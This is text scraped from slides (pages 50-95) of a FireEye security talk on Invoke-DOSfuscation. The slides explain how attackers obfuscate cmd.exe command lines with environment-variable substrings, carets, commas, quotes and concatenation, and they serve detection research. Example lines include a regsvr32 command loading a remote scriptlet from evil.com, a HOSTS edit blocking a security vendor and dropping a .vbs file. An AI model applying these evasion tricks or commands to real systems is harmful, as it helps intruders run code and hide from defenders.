• Out-FINcodedCommand POC
• A few binary syntax options with
environment variable character substitution
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 50: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/50.jpg)
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1%
decodes to set
• Env var encoding in the wild
• SHA-256: 661877d416f34411fad7e22246ee0d61d14de3065a34b0a7b2f28052d56db6e2
50
Deep Dive: Character Insertion Obfuscation (ITW 1/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 51: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/51.jpg)
• Env var encoding in the wild
• SHA-256: 9e1df42f00829d16afd97c575f08da45467bbcab92ca5e3d2832a009dddaa8a7
• Obfuscator: https://github.com/guillaC/JSBatchobfuscator
51
Set full alphabet in custom env var
DECODED
Deep Dive: Character Insertion Obfuscation (ITW 2/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 52: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/52.jpg)
Set env var called
' (single quote)
with known env
var substrings
• Env var encoding in the wild
• SHA-256: 761483906b45fad51f3c7ab66b1534dee137e93a52816aa270bc97249acb56d0 (see white paper!)
52
Assemble payload
as substrings from
newly-set ' env var
Deep Dive: Character Insertion Obfuscation (ITW 3/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 53: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/53.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
C:\> Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
53 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 54: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/54.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
54
Deep(er) Dive: Advanced Payload Obfuscation
cmd.exe setup portion rest of the command
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 55: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/55.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• %COMSPEC% :: env var for "C:\Windows\system32\cmd.exe"
• /b :: exits cmd.exe to calling program with specified process exit code
• /c :: remainder of command line processed as a command
• start :: execute remaining command without waiting for it to finish
• /b :: (same as before but for second command)
• /min :: start window minimized
55
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 56: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/56.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
56
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 57: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/57.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
57
Deep(er) Dive: Advanced Payload Obfuscation
27 chars
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 58: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/58.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
58
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
Deep(er) Dive: Advanced Payload Obfuscation
27 chars
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 59: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/59.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
59
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
27 chars
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 60: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/60.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• Env var substitution
60
• %COMSPEC:\=/%
• %COMSPEC:KeepMatt=Happy%
• %COMSPEC:*System32\=%
• %COMSPEC:*Tea=Coffee%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 61: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/61.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %COMSPEC:~0,27%
• Env var substitution
• %COMSPEC:\=/%
61
• %COMSPEC:\=/%
• %COMSPEC:KeepMatt=Happy%
• %COMSPEC:*System32\=%
• %COMSPEC:*Tea=Coffee%
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 62: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/62.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~0,27%
• Env var substitution
• %coMSPec:\=/%
62
• Random Case
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 63: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/63.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ 0, 27%
• Env var substitution
• %coMSPec: \ = / %
63
• Random Case
• Whitespace
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 64: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/64.jpg)
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ -0, +27%
• Env var substitution
• %coMSPec: \ = / %
64
• Random Case
• Whitespace
• Explicit signing
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 65: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/65.jpg)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
• Env var substring
• %coMSPec:~ -0, +27%
• Env var substitution
• %coMSPec: \ = / %
65
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 66: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/66.jpg)
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
66
• Context is crucial
• ✔ Cmd.exe
• ✔WScript.Shell
• ✘ Service
• ✘ Run key
• ✘ Scheduled task
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 67: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/67.jpg)
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -aNo | fiNDstr LISTENING
67
• Random case
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 68: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/68.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
68
C:\Windows\system32\cmd.exe /B/csTArt/b/mIN neTSTat -aNo
NOTE: Single whitespace is added
to process arguments.
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 69: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/69.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
69
Netstat's -ano arg reordering• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 70: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/70.jpg)
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -Noa|fiNDstr LISTENING
70
Netstat's -ano arg reordering• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 71: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/71.jpg)
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -Noa | fiNDstr
LISTENING
71
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 72: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/72.jpg)
• ,;,%coMSPec: \ = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr
LISTENING
72
• Random case
• Whitespace (-/+)
• Comma & semicolon
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 73: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/73.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
73
Let's look at process
execution layers &
respective arguments!
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 74: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/74.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
74
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^
|,;,fi^NDstr LIST^ENING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
neTSTat -Noa
fiNDstr LISTENING
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 75: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/75.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr
LIST^^^ENING
75
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^
|,;,fi^NDstr LIST^ENING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
neTSTat -Noa
fiNDstr LISTENING
, ; and ^ do NOT persist into final
netstat & findstr commands. Is there
another obfuscation character?
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 76: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/76.jpg)
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b
^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^ST""at ^^^^ ^^^^-N^^^^o""a ^^^^ ^|,;,fi^^^ND""str
LIST^^^EN""ING
76
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^ST""at ^^ ^^-N^^o""a
^^ |,;,fi^ND""str LIST^EN""ING
C:\Windows\system32\cmd.exe /S /D /c"
sTArt,;,/^b ^ ,;/^mIN^ ,;neT^ST""at ^ ^-N^o""a ^ "
neTST""at -No""a
fiND""str LISTEN""ING
YES! Double quotes are widely-
accepted obfuscation characters.
(, ; and ^ are binary-specific)
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 77: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/77.jpg)
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
• User-input command (e.g. netstat -ano)
must be obfuscated manually (, ; ^ "" etc.)
• Invoke-DOSfuscation handles all layers
of escaping for input obfuscation characters
77
INSANELY complicated in certain
scenarios, especially since there is
no tokenizer for cmd.exe like there
is for PowerShell.
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 78: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/78.jpg)
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
• User-input command (e.g. netstat -ano)
must be obfuscated manually (, ; ^ "" etc.)
• Invoke-DOSfuscation handles all layers
of escaping for input obfuscation characters
78
INSANELY complicated in certain
scenarios, especially since there is
no tokenizer for cmd.exe like there
is for PowerShell.http://www.reactiongifs.com/r/small-violin.gif
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 79: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/79.jpg)
• What cmd.exe commands do attackers use that do NOT create child processes?
79
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 80: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/80.jpg)
• What cmd.exe commands do attackers use that do NOT create child processes?
• File copy: cmd /c copy powershell.exe benign.exe
• File deletion: cmd /c del benign.exe
• File creation: cmd /c "echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs"
• File read: cmd /c type HOSTS
• File modification: cmd /c "echo 127.0.0.1 cloud.security-vendor.com >> HOSTS"
• File listing: cmd /c dir "C:\Program Files\*"
• Dir creation: cmd /c mkdir %PUBLIC%\Recon
• Symbolic link creation: cmd /c mklink ClickMe C:\Users\Public\evil.exe
80
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 81: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/81.jpg)
• Perhaps your target is monitoring for carets, commas, semicolons, etc.
• What additional obfuscation options does cmd.exe give us?
1.
2.
3.
4.
81
Deep(er) Dive: Advanced Payload Obfuscation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 82: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/82.jpg)
• cmd /c netstat -ano
82
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 83: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/83.jpg)
• cmd /c netstat -ano
83
– and / interchangeability
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 84: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/84.jpg)
• cmd /c netstat /ano
84
– and / interchangeability
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 85: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/85.jpg)
• cmd /c netstat /ano
85
– and / interchangeability
• More examples:
• wscript.exe /nologo …
• powershell.exe -nop -noni -enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 86: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/86.jpg)
• cmd /c netstat /ano
86
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe -nop -noni -enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 87: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/87.jpg)
• cmd /c netstat /ano
87
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 88: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/88.jpg)
• cmd /c netstat /ano
88
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 89: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/89.jpg)
• cmd /c netstat /ano
89
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https://evil.com/a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 90: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/90.jpg)
• cmd /c netstat /ano
90
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 91: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/91.jpg)
• cmd /c netstat /ano
91
– and / interchangeability
• More examples:
• wscript.exe -nologo …
• powershell.exe /nop /noni /enc …
• regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll
https://i.imgur.com/8oXBdLG.gif
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 92: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/92.jpg)
• cmd /c "set com=netstat /ano&&echo %com%"
92
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 93: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/93.jpg)
• cmd /c "set com=netstat /ano&&echo %com%"
93
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 94: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/94.jpg)
• cmd /c "set com=netstat /ano&&call %com%"
94
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 95: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/95.jpg)
• cmd /c "set com=netstat /ano&&call %com%"
95
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
